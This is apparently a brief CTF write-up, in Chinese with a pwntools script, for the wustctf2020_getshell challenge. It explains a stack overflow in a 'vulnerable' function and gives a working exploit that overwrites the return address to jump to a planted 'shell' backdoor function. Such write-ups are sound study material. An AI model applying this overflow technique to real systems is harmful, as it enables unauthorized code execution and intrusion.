wustctf2020_getshell
ret2shell
- 在
vulnerable
函数中存在溢出漏洞 shell
函数中已经预留了后门
溢出->跳转到后门函数
from pwn import *
context.log_level = 'debug'
elf=ELF('wustctf2020_getshell')
io = process('wustctf2020_getshell')
payload = b'A'*(0x18+0x4)+p32(elf.sym['shell'])
io.sendline(payload)
io.interactive()
标签:getshell,shell,wustctf2020,elf,io,payload
From: https://www.cnblogs.com/bamuwe/p/17937485